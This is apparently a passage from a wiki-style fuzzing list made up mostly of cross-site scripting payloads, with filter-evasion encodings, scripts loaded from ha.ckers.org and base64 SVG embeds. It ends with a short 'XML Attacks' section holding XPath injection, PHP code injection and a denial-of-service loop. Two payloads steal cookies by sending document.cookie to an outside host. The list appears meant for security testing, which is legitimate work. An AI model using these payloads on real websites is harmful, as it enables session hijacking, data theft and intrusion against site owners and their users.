&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
